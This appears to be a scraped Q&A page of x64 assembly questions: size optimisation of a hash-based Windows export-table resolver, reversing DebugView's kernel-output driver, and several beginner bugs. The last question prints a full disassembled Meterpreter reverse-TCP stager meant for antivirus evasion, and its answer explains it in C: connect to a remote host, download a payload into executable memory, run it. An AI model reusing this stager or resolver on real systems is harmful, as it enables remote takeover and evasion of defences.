x64 Assembly Optimization - windows

I am trying to optimize several assembly procedures for size, I am not concerned about the speed.
The optimizations I am familiar with are situations as follows:
;the following two lines
mov rbp, rsp
add rbp, 50h
;can be changed to
lea rbp, [rsp+50h]
What other optimizations I can use to reduce the number of bytes in the following procedure?
I am not asking anyone to fully optimize this procedure, just point out where I can improve.
;get procedure address
asmGetProc proc
push rcx ;pointer to function name
push rdx ;DllBase address (IMAGE_DOS_HEADER pointer)
push r8 ;pointer to IMAGE_EXPORT_DIRECTORY
push r9 ;IMAGE_EXPORT_DIRECTORY->NumberOfNames
;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals[r9]
push rbx ;saved pointer to function name
push r10 ;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNames
;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfFunctions
mov rbx, rcx ;save the function name pointer to rax
mov r8d, [rdx+3ch] ;IMAGE_DOS_HEADER->e_lfanew (DWORD) (Offset to IMAGE_NT_HEADERS64)
add r8, rdx ;add DllBase to the e_lfanew offset
add r8, 88h ;18h - IMAGE_NT_HEADERS64->OptionalHeader (IMAGE_OPTIONAL_HEADER64) 18h bytes
;70h - skip entire IMAGE_OPTIONAL_HEADER64 structure
;r8 points to the IMAGE_DATA_DIRECTORY structure
mov r8d, [r8] ;IMAGE_DATA_DIRECTORY->VirtualAddress (DWORD)
add r8, rdx ;add DllBase to VirtualAddress (IMAGE_EXPORT_DIRECTORY)
mov r9d, [r8+18h] ;IMAGE_EXPORT_DIRECTORY->NumberOfNames
mov r10d, [r8+20h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNames (DWORD)
add r10, rdx ;add DllBase to AddressOfNames (DWORD)
for_each_function:
;decrement function name counter
dec r9
;load current index of AddressOfNames into r11
lea rcx, [r10 + 4 * r9] ;AddressOfNames[i] - function string RVA (relative virtual address)
mov ecx, [rcx] ;r11d is the AddressOfName[r9] RVA (DWORD)
add rcx, rdx ;add DllBase to string RVA DWORD
call asmHsh ;hash the function name
cmp rax, rbx ;compare the function name hash with the passed hash
jnz for_each_function ;jump to top of loop is not a match
;r8 - export directory
;r9 - function name counter
;r10 - AddressOfNameOrdinals / AddressOfFunctions array
;rax - final point to function
mov r10d, [r8+24h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals (DWORD)
add r10, rdx ;add DllBase to AddressOfNameOrdinals DWORD
mov r9w, [r10+2*r9] ;AddressOfNameOrdinals[2*r9] - (2*r9 = 2 bytes * function name counter)
mov r10d, [r8+1ch] ;IMAGE_EXPORT_DIRECTORY->AddressOfFunctions (DWORD)
add r10, rdx ;add DllBase to AddressOfFunctions DWORD
mov eax, [r10+r9*4] ;AddressOfFunctions[4*r9] - (4*r9 = 4 bytes * function ordinal)
add rax, rdx ;add DllBase to function ordinal RVA DWORD
pop r10
pop rbx
pop r9
pop r8
pop rdx
pop rcx
ret ;return from procedure
asmGetProc endp
EDIT: Added asmHsh (my bad)
;hash function (djb2)
asmHsh proc
;rcx - null terminated function name
push rcx
push rdx
mov rax, 5381d
hl:
mov rdx, rax
shl rax, 5
add rax, rdx
xor al, [rcx]
inc rcx
;check for null termination
mov dl, [rcx]
cmp dl, 00h
jne short hl
pop rdx
pop rcx
ret
asmHsh endp

Optimizing assembly for space in 64-bit mode one should: (1) use DWORD width when that suffices (less prefixes); (2) stick to the old X86 registers eax-edx / esi / edi / ebp (tighter encoding).
Hopefully what's done below illustrates the idea. ML64 assembled the original routines to 135 bytes and the modified version to 103 bytes.
Examples of changes: (1) used rbp / rsi / rdi instead of r8 / r9 / r10; (2) shrunk instruction sequences that could be accomplished via multi-component address modes; (3) used DWORD dec where the data is known to be 32-bits; (4) used IMUL in place of shift/add.
" ;- " is in front of removed lines " ;## delta " is appended to added lines, where delta is the byte difference the new code produced. No attempt was made to adjust the comments.
;hash function (djb2)
asmHsh proc
;rcx - null terminated function name
push rcx
;-push rdx ;## -1
mov rax, 5381d
hl:
;- mov rdx, rax
;- shl rax, 5
;- add rax, rdx
imul rax,rax,33 ;## -6
xor al, [rcx]
inc rcx
;check for null termination
;-mov dl, [rcx]
;-cmp dl, 00h
cmp byte ptr [rcx], 00h ;## -2
jne short hl
;-pop rdx ;## -1
pop rcx
ret
asmHsh endp
;get procedure address
asmGetProc proc
push rcx ;pointer to function name
push rdx ;DllBase address (IMAGE_DOS_HEADER pointer)
;-push r8 ;pointer to IMAGE_EXPORT_DIRECTORY
push rbp ;## -1
;-push r9 ;IMAGE_EXPORT_DIRECTORY->NumberOfNames
push rsi ;## -1
;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals[r9]
push rbx ;saved pointer to function name
;-push r10 ;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNames
push rdi ;## -1
;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfFunctions
mov rbx, rcx ;save the function name pointer to rax
;-mov r8d, [rdx+3ch] ;IMAGE_DOS_HEADER->e_lfanew (DWORD) (Offset to IMAGE_NT_HEADERS64)
mov ebp, [rdx+3ch] ;## -1
;-add r8, rdx ;add DllBase to the e_lfanew offset
;-add r8, 88h ;18h - IMAGE_NT_HEADERS64->OptionalHeader (IMAGE_OPTIONAL_HEADER64) 18h bytes
;- ;70h - skip entire IMAGE_OPTIONAL_HEADER64 structure
;- ;r8 points to the IMAGE_DATA_DIRECTORY structure
;-mov r8d, [r8] ;IMAGE_DATA_DIRECTORY->VirtualAddress (DWORD)
mov ebp, [rbp+rdx+88h] ;## -5
;-add r8, rdx ;add DllBase to VirtualAddress (IMAGE_EXPORT_DIRECTORY)
add rbp, rdx ;## 0
;-mov r9d, [r8+18h] ;IMAGE_EXPORT_DIRECTORY->NumberOfNames
mov esi, [rbp+18h] ;## -1
;-mov r10d, [r8+20h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNames (DWORD)
mov edi, [rbp+20h] ;## -1
;-add r10, rdx ;add DllBase to AddressOfNames (DWORD)
add rdi, rdx ;## 0
for_each_function:
;decrement function name counter
;- dec r9
dec esi ;## -1
;load current index of AddressOfNames into r11
;- lea rcx, [r10 + 4 * r9] ;AddressOfNames[i] - function string RVA (relative virtual address)
;- mov ecx, [rcx] ;r11d is the AddressOfName[r9] RVA (DWORD)
mov ecx, [rdi + 4 * rsi] ;## -3
add rcx, rdx ;add DllBase to string RVA DWORD
call asmHsh ;hash the function name
cmp rax, rbx ;compare the function name hash with the passed hash
jnz for_each_function ;jump to top of loop is not a match
;r8 - export directory
;r9 - function name counter
;r10 - AddressOfNameOrdinals / AddressOfFunctions array
;rax - final point to function
;-mov r10d, [r8+24h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals (DWORD)
mov edi, [rbp+24h];## -1
;-add r10, rdx ;add DllBase to AddressOfNameOrdinals DWORD
add rdi, rdx; ## 0
;-mov r9w, [r10+2*r9] ;AddressOfNameOrdinals[2*r9] - (2*r9 = 2 bytes * function name counter)
mov si, [rdi+2*rsi] ;## -1
;-mov r10d, [r8+1ch] ;IMAGE_EXPORT_DIRECTORY->AddressOfFunctions (DWORD)
mov edi, [rbp+1ch] ;## -1
;-add r10, rdx ;add DllBase to AddressOfFunctions DWORD
add rdi, rdx ;## 0
;-mov eax, [r10+r9*4] ;AddressOfFunctions[4*r9] - (4*r9 = 4 bytes * function ordinal)
mov eax, [rdi+rsi*4] ; ## -1
add rax, rdx ;add DllBase to function ordinal RVA DWORD
;-pop r10
pop rdi ; ## -1
pop rbx
;-pop r9
pop rsi
;-pop r8
pop rbp ;## -1
pop rdx
pop rcx
ret ;return from procedure
asmGetProc endp

Related

What does DebugView's "Enable Verbose Kernel Output" do?

I've followed Microsoft's "Write a Hello World Windows Driver (KMDF)" and wasn't sure how to see the output on WinDbg. After trying to set the Debug Print Filter registry to 0xFFFFFFFF, rebooting and other rain dance solutions, the one thing that worked was enabling DebugView's "Enable Verbose Kernel Output" option. Now, WinDbg shows debug outputs. Its too verbose but at least it's there.
So what did DebugView modify for WinDbg to show more verbose debug output?
I'm running WinDbg attached to a VM from my Windows host with a bridged connection.
TL;DR: it calls a driver to repeatedly call NtSetDebugFilterState on all kernel components, so that they are all able to print something on the debug output.
Program
Let start with the program itself; there's only one occurrence of the sentence "Enable Verbose Kernel Output":
mov [rsp+78h+mi.wID], 9C7Ch
lea rax, aEnableVerboseK ; "Enable &Verbose Kernel Output"
sbb ecx, ecx
mov [rsp+78h+mi.dwTypeData], rax
and ecx, 8
mov [rsp+78h+mi.fState], ecx
mov rcx, cs:hMenu ; hMenu
call cs:GetSubMenu
mov rcx, rax ; hmenu
lea r9, [rsp+78h+mi] ; lpmi
lea edx, [rdi+3] ; item
lea r8d, [rdi+1] ; fByPosition
call cs:InsertMenuItemA
The above code insert the sub-menu into the main menu. What's important here is the the menu ID, namely 0x9C7C.
This menu ID is used only once more here:
movzx edx, al ; al can either be 0 or 1
xor edi, edi
mov qword ptr [rsp+830h+iNumButtons], rdi ; lpOverlapped
lea rax, [rsp+830h+BytesReturned]
mov [rsp+830h+lpButtons], rax ; lpBytesReturned
xor edx, 1
mov dword ptr [rsp+830h+wBMID], edi ; nOutBufferSize
xor r9d, r9d ; nInBufferSize
xor r8d, r8d ; lpInBuffer
mov [rsp+830h+dwInitParam], rdi ; lpOutBuffer
lea edx, ds:0FFFFFFFF8305003Ch[rdx*4] ; dwIoControlCode
call cs:DeviceIoControl
movzx eax, cs:byte_1400935A3
mov edx, 9C7Ch ; uIDCheckItem
mov rcx, cs:hMenu ; hMenu
mov cs:byte_1400A2776, al
neg al
sbb r8d, r8d
and r8d, 8 ; uCheck
call cs:CheckMenuItem
The above code calls DeviceIoControl and then checks the menu item. The former means the program is actually talking with a device driver.
If we remove a bit of code we can see which IOCTL can be sent to the driver:
movzx edx, al ; al can either be 0 or 1
; snip
xor edx, 1 ; invert AL
; snip
lea edx, ds:0FFFFFFFF8305003Ch[rdx*4] ; dwIoControlCode
call cs:DeviceIoControl
Since RDX can be either 0 or 1 we end up with (base 10):
[rdx*4-2096824260]
Thus:
4 - 2096824260 = -2096824256
0 - 2096824260 = -2096824260
Looking at the handles opened by dbgview64.exe we can see a \Device\dbgv is currently opened.
0: kd> !devobj \Device\dbgv
Device object (ffffd58a97007630) is for:
Dbgv \Driver\DBGV DriverObject ffffd58a8688aaa0
Current Irp 00000000 RefCount 0 Type 00008305 Flags 00000048
SecurityDescriptor ffffe58fb8bdeea0 DevExt 00000000 DevObjExt ffffd58a97007780
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)
Device queue is not busy.
0: kd> dt _driver_object ffffd58a8688aaa0
nt!_DRIVER_OBJECT
+0x000 Type : 0n4
+0x002 Size : 0n336
+0x008 DeviceObject : 0xffffd58a`97007630 _DEVICE_OBJECT
+0x010 Flags : 0x12
+0x018 DriverStart : 0xfffff800`dcf90000 Void
+0x020 DriverSize : 0x9000
+0x028 DriverSection : 0xffffd58a`a3ba9be0 Void
+0x030 DriverExtension : 0xffffd58a`8688abf0 _DRIVER_EXTENSION
+0x038 DriverName : _UNICODE_STRING "\Driver\DBGV"
+0x048 HardwareDatabase : 0xfffff800`8372e990 _UNICODE_STRING "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
+0x050 FastIoDispatch : (null)
+0x058 DriverInit : 0xfffff800`dcf97058 long +0
+0x060 DriverStartIo : (null)
+0x068 DriverUnload : (null)
+0x070 MajorFunction : [28] 0xfffff800`dcf91b80 long +0
0: kd> dt nt!_LDR_DATA_TABLE_ENTRY 0xffffd58a`a3ba9be0 Full*
+0x048 FullDllName : _UNICODE_STRING "\??\C:\WINDOWS\system32\Drivers\Dbgv.sys"
So the driver is currently loaded from C:\WINDOWS\system32\Drivers\Dbgv.sys (or you can extract it from the .rsrc section...).
Driver
Looking at the driver, in the driver entry we spot the function used for IRP_MJ_DEVICE_CONTROL:
lea rax, sub_180001B80
mov [rdi+0E0h], rax ; IRP_MJ_DEVICE_CONTROL
mov [rdi+80h], rax
mov [rdi+70h], rax
Inside that function we have the usual setup before calling the right IOCTL:
movzx eax, [rcx+_IO_STACK_LOCATION.MajorFunction]
mov r9d, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.OutputBufferLength]
mov r10d, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
test al, al ; IRP_MJ_CREATE
jz loc_180001C6C
cmp al, 2 ; IRP_MJ_CLOSE
jz short loc_180001C0C
cmp al, 0Eh ; IRP_MJ_DEVICE_CONTROL
jnz ##CompleteRequest
mov eax, r10d
and eax, 3
cmp al, METHOD_NEITHER
jnz short loc_180001BDF
mov rdx, [rdi+_IRP.UserBuffer]
loc_180001BDF:
mov [rsp+98h+do], r11 ; _DEVICE_OBJECT*
mov [rsp+98h+IoStatus], rbx ; IoStatus
mov [rsp+98h+ioctl], r10d ; IoCtl
mov [rsp+98h+OutputBufferLength], r9d ; OuputBufferLength
mov r9d, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.InputBufferLength] ; int
mov rcx, [rcx+_IO_STACK_LOCATION.FileObject]
mov qword ptr [rsp+98h+Buffer], rdx ; Buffer
mov dl, 1 ; int
call sub_1800017E0
jmp ##CompleteRequest
Inside the call (sub_1800017E0) we have a big switch for the IOCTL, here's the case -2096824260 (case -2096824256 is slightly different):
loc_1800018B9:
call sub_180002470 ; jumptable 000000018000182F case -2096824260
jmp loc_180001AEB
This function is mostly comprised of two loops:
loc_1800024A0:
xor ebx, ebx
##LoopQuerySetDebugFilter:
mov edx, ebx
mov ecx, esi
call cs:qword_180005438 ; DbgQueryDebugFilterState
mov r8b, 1 ; State
mov edx, ebx ; Level (keeps incrementing up to 0x1E)
mov ecx, esi ; ComponentId (keeps incrementing up to 0x82)
mov [rdi], al ; save current state.
call cs:qword_180005440 ; DbgSetDebugFilterState
inc ebx
inc rdi
cmp ebx, 1Eh
jb short ##LoopQuerySetDebugFilter
inc esi
cmp esi, 82h ; '‚'
jb short loc_1800024A0
Both calls are on DbgQueryDebugFilterState and DbgSetDebugFilterState (reactos source)
which is just a minimal wrapper around NtSetDebugFilterState (reactos source).
As far as we can see the debug filter state is queried, saved, and then set for all kernel components (following is the component tables from the kernel, there are a lot of them):
.rdata:00000001400073E0 KdComponentTable dq offset Kd_SYSTEM_Mask
.rdata:00000001400073E0 ; DATA XREF: NtQueryDebugFilterState+36↓o
.rdata:00000001400073E0 ; NtSetDebugFilterState+43↓o ...
.rdata:00000001400073E8 dq offset Kd_SMSS_Mask
.rdata:00000001400073F0 dq offset Kd_SETUP_Mask
.rdata:00000001400073F8 dq offset Kd_NTFS_Mask
.rdata:0000000140007400 dq offset Kd_FSTUB_Mask
.rdata:0000000140007408 dq offset Kd_CRASHDUMP_Mask
.rdata:0000000140007410 dq offset Kd_CDAUDIO_Mask
.rdata:0000000140007418 dq offset Kd_CDROM_Mask
.rdata:0000000140007420 dq offset Kd_CLASSPNP_Mask
....
Which finally means that all kernel components are able to print something to the debug output.
Note that the other IOCTL just reset the components masks to what they were before checking the menu in the main program.

Reversing an array and printing it in x86-64

I am trying to print an array, reverse it, and then print it again. I manage to print it once. I can also make 2 consecutive calls to _printy and it works. But the code breaks with the _reverse function. It does not segfault, it exits with code 24 (I looked online but this seems to mean that the maximum number of file descriptors has been exceeded, and I cannot get what this means in this context). I stepped with a debugger and the loop logic seems to make sense.
I am not passing the array in RDI, because _printy restores the content of that register when it exits. I also tried to load it directly into RDI before calling _reverse but that does not solve the problem.
I cannot figure out what the problem is. Any idea?
BITS 64
DEFAULT REL
; -------------------------------------
; -------------------------------------
; PRINT LIST
; -------------------------------------
; -------------------------------------
%define SYS_WRITE 0x02000004
%define SYS_EXIT 0x02000001
%define SYS_OPEN 0x02000005
%define SYS_CLOSE 0x02000006
%define SYS_READ 0x02000003
%define EXIT_SUCCESS 0
%define STDOUT 1
%define LF 10
%define INT_OFFSET 48
section .text
extern _printf
extern _puts
extern _exit
global _main
_main:
push rbp
lea rdi, [rel array]
call _printy
call _reverse
call _printy
pop rbp
call _exit
_reverse:
push rbp
lea rsi, [rdi + 4 * (length - 1) ]
.LOOP2:
cmp rdi, rsi
jge .DONE2
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
add rdi,4
sub rsi,4
jmp .LOOP2
.DONE2:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
_printy:
push rbp
xor rcx, rcx
mov r8, rdi
.loop:
cmp rcx, length
jge .done
push rcx
push r8
lea rdi, [rel msg]
mov rsi, [r8 + rcx * 4]
xor rax, rax
call _printf
pop r8
pop rcx
add rcx, 1
jmp .loop
.done:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
section .data
array: dd 78, 2, 3, 4, 5, 6
length: equ ($ - array) / 4
msg: db "%d => ", 0
Edit with some info from the debugger
Stepping into the _printy function gives the following msg, once reaching the call to _printf.
* thread #1, queue = 'com.apple.main-thread', stop reason = step over failed (Could not create return address breakpoint.)
frame #0: 0x0000000100003f8e a.out`printf
a.out`printf:
-> 0x100003f8e <+0>: jmp qword ptr [rip + 0x4074] ; (void *)0x00007ff80258ef0b: printf
0x100003f94: lea r11, [rip + 0x4075] ; _dyld_private
0x100003f9b: push r11
0x100003f9d: jmp qword ptr [rip + 0x5d] ; (void *)0x00007ff843eeb520: dyld_stub_binder
I am not an expert, but a quick research online led to the following
During the 'thread step-out' command, check that the memory we are about to place a breakpoint in is executable. Previously, if the current function had a nonstandard stack layout/ABI, and had a valid data pointer in the location where the return address is usually located, data corruption would occur when the breakpoint was written. This could lead to an incorrectly reported crash or silent corruption of the program's state. Now, if the above check fails, the command safely aborts.
So after all this might not be a problem (I am also able to track the execution of the printf call). But this is really the only understandable piece of information I am able to extract from the debugger. Deep in some quite obscure (to me) function calls I reach this
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff80256db7f libsystem_c.dylib`flockfile + 10
libsystem_c.dylib`flockfile:
-> 0x7ff80256db7f <+10>: call 0x7ff8025dd480 ; symbol stub for: __error
0x7ff80256db84 <+15>: mov r14d, dword ptr [rax]
0x7ff80256db87 <+18>: mov rdi, qword ptr [rbx + 0x68]
0x7ff80256db8b <+22>: add rdi, 0x8
Target 0: (a.out) stopped.
(lldb)
Process 61913 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff8025dd480 libsystem_c.dylib`__error
This is one of the function calls happening in _printf.
Ask further questions if there is something more I can do.
Your array consists of int32 numbers aka dd in nasm terminology, but your swap operates on 64 bit numbers:
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
Assuming you were not after some crazy optimizations where you swap a pair of elements simultaneously you want this to remain in 32 bits:
mov r8d, [rdi]
mov r9d, [rsi]
mov [rdi], r9d
mov [rsi], r8d

How to break infinite loop assembly Windows x64

I'm trying to add arrA and arrB and store the values into arrC and print out.. once I run the code it takes me to infinite loop. How can I break the loop? Any suggestions greatly appreciated.
ExitProcess PROTO
WriteHex64 PROTO
.data
arrA BYTE 10h, 30h
arrB BYTE 0E0h, 40h
arrC BYTE 0, 0
string BYTE ", ", 00h
.code
main PROC
nop
mov rdi, OFFSET arrA
mov rsi, OFFSET arrB
mov rbx, OFFSET arrC
mov rdx, OFFSET string
mov rcx, LENGTHOF arrA
mov rax, 0
L1:
mov rax, [rdi]
mov rax, [rsi]
add rdi, TYPE arrA
add rsi, TYPE arrB
mov [rbx], rax
add rbx, TYPE arrC
call WriteHex64
call WriteString
loop L1
nop
mov ecx, 0
call ExitProcess
main ENDP
END

is there a difference between al and dl? [duplicate]

This question already has answers here:
How do AX, AH, AL map onto EAX?
(6 answers)
Closed 2 years ago.
First, it is my first assembly. And I use it with "NASM" and "64bit ASM" and "Intel" code and Mac OS.
When I try to write strdup function, it didn't work with al.
In using my strdup function, the string was broken.
So, my code is here.
global _strdup
extern _malloc
section .text
_strdup:
xor rcx, rcx
jmp strlen
strlen:
cmp [rdi + rcx], byte 0
je malloc
inc rcx
jmp strlen
malloc:
inc rcx
push rdi
mov rdi, rcx
call _malloc
pop rdi
cmp rax, 0
je error
xor rcx, rcx
jmp copy
copy:
mov al, byte [rdi + rcx]
mov byte [rax + rcx], al
cmp al, byte 0
je return
jmp increment
increment:
inc rcx
jmp copy
error:
mov rax, 0
ret
return:
ret
But, when I write same code with dl not al, it works!
global _strdup
extern _malloc
section .text
_strdup:
xor rcx, rcx
jmp strlen
strlen:
cmp [rdi + rcx], byte 0
je malloc
inc rcx
jmp strlen
malloc:
inc rcx
push rdi
mov rdi, rcx
call _malloc
pop rdi
cmp rax, 0
je error
xor rcx, rcx
jmp copy
copy:
mov dl, byte [rdi + rcx]
mov byte [rax + rcx], dl
cmp dl, byte 0
je return
jmp increment
increment:
inc rcx
jmp copy
error:
mov rax, 0
ret
return:
ret
I don't know why dl works and the difference between al and dl.
Anyone know about it? Thanks.
al is the smallest part of rax while dl is the smallest part of rdx. Changing al will change the value of rax as well.
Why your code is not working with al?
copy:
mov al, byte [rdi + rcx] ; you move "byte [rdi + rcx]" in "al"
; thus changing the value of "rax" as well.
; the result of the following statement becomes unexpected
mov byte [rax + rcx], al
But when you do it with dl, rax is not affected and hence your program works as expected.
Try the following code and run it through debugger to see the effect of changing the value of al on `rax:
section .text
global main
main:
nop
mov rax, 1000
mov al, byte 10
nop
Result:
After mov rax, 1000, value of rax: 1000
00000000 00000000 00000000 00000000 00000000 00000000 00000011 11101000
After mov al, 10, value of rax: 778
00000000 00000000 00000000 00000000 00000000 00000000 00000011 00001010
^^^^^^^^
So, changing al will affect rax.

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?
your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

Resources